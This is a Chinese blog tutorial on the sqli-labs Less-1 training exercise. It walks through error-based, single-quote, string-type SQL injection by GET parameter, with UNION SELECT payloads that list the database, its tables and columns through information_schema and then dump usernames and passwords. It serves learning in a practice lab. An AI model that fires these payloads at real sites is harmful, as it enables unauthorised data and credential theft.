【SQL注入】Less-1错误型GET单引号字符型注入 - 代码天地

【SQL注入】Less-1错误型GET单引号字符型注入

其他 2021-04-06 18:53:49 阅读次数: 0

Less-1错误型GET单引号字符型注入

什么是单引号字符串型注入？
通过'的报错进行sql查询，并用mysql能输出字符串型的函数，获取我们想要的数据。

漏洞复现过程

在实验室浏览器打开Less-1

1、发现注入点

输入?id=1 正常；

输入?id=1' 报错，就存在sql注入漏洞。

2、猜id=1显示条件中表的字段

例如输入?id=1' order by 3 --+ 显示正常
再次输入?id=1' order by 4 --+ 显示错误
所以的出，在?id=1查看的这个表有3个字段

3、爆开数据库

payload
?id=-1' union select 1,2,database() --+

4、爆开数据表

payload
?id=0' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --+

5、表开数据列(字段)

payload
?id=0' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' --+

6、爆开数据值

payload
?id=0' union select 1,group_concat(username,0x3a,password),3 from users--+

函数与要点介绍

1、union select 1,group_concat(table_name),3
?id=0等于我们要查询的表，在实验第一步时候，我们得到该查询的表有3个字段；所以我们在构建select时候，必须满足3个字段条件；
例如：select 1,2,3 那么 group_concat(table_name)表示2；这点有点像数组，你必须规定3个值，才能进行正常的赋值后显示。

2、group_concat()
group_concat函数是典型的字符串连接函数；

3、0x3a
0x3a是:16进制的分隔符,比如在爆开数据值使用中(username,0x3a,password)表示(username:password)

4、information_schema
表示存储了数据表tables 列columns的元数据信息;用法：常规的sql查询中from xxx查询的元素或表 where xxx查询的条件；
5、database()
列出数据库的库名；
6、table_schema=database()
累出数据库的表名，这里存在赋值。

以上掌握，接下来的实验，仅提供payload和一些用法分析，我们进行下一步实验

猜你喜欢

转载自blog.csdn.net/Mitchell_Donovan/article/details/115335650

【SQL注入】Less-1错误型GET单引号字符型注入

【SQL注入】Less-3错误型GET单引号变形字符型注入

【SQL注入】Less-5双注入GET单引号字符型注入

【SQL注入】Less-11基于错误的POST单引号字符型注入

【SQL注入】Less-4错误型GET双引号字符型注入

less 3 GET - Error based - Single quotes with twist string (基于错误的GET单引号变形字符型注入)

sqli-labs—————Less-1（字符型注入）

【SQL注入】Less-6双注入GET双引号字符型注入

【SQL注入】Less-12基于错误的双引号POST字符型变形的注入

less 4 GET - Error based - Double Quotes - String （基于错误的GET双引号字符型注入）

SQL注入——Less-1

【SQL注入】Less-2错误型GET整型注入

SQL练习（less-4）双引号字符型注入

【SQL注入】Less-7导出文件GET字符型注入

暑期练习web23：sqli lab第五关双注入GET单引号字符型注入----基于bool型的手工盲注

sqli-labs/less-1：基于错误提示的sql注入

sql-lib注入天书-Less-1

Sql注入之Sqli-labs Less-1

2021-11-09 SQL注入---字符型注入（GET）

Less（22）Cookie Injection- Error Based- Double Quotes - string (基于错误的双引号字符型Cookie注入)

SQL练习（less-6）字符型&报错注入

sql注入（二）-------字符型

【pikachu】-SQL注入（字符型）

SQL注入——字符型union注入

SQL注入---数字型注入与字符型注入

sql字符型注入-sqli第1关

CTFHub-SQL注入整数型注入字符型注入报错注入布尔盲注

pikachu-字符型注入(get) #手工注入

自动完成-SQL注入单引号

SQL注入——报错型注入

今日推荐

基于大语言模型的开源知识库问答系统 MaxKB GitHub Star 数量突破 5,000 个！

美国拟限制 AI 大模型出口中国和俄罗斯

苹果将与 OpenAI 达成协议，将 ChatGPT 应用于 iPhone

openKylin 社区生态委员会第六次会议圆满召开

阿里云正式发布通义千问 2.5

Python 3.13 发布首个 Beta：实验性自由线程模式和 JIT、改进交互式解释器

Stack Overflow 拿我的代码去训练 AI 大模型，还封了我的账号

Pop!_OS 的 COSMIC 桌面完成 App Store 上架工作

报告：Django 仍然是 74% 开发者的首选

《2024 年一季度互联网投融资运行情况》研究报告

15 年前上了“FFmpeg 耻辱柱”，今天他还得谢谢咱——腾讯QQPlayer一雪前耻？

TIOBE 5 月榜单：Fortran “复活”进入 Top 10

周排行

BPM为企业带来的实际利益

好程序员web前端分享css常用属性缩写

Java文件下载（excel）

css样式的动态添加及显示和隐藏等零碎用法

axios全局配置以及拦截器

使用Logstash来实时同步MySQL和log日志数据到ES

C++获取当前时间（年月日、时分秒、毫秒）

Odoo产品分析 (四) -- 工具板块(11) -- 网站即时聊天(1)

Java环境配置正确，但是java、javac、java -version均返回“不是内部或外部命令，也不是可运行的程序或批处理文件”？

01 官网下载各种CentOS教程（超详细版）

每日归档

更多

2024-05-14(0)

2024-05-13(18)

2024-05-12(0)

2024-05-11(38)

2024-05-10(38)

2024-05-09(35)

2024-05-08(42)

2024-05-07(14)

2024-05-06(40)

2024-05-05(0)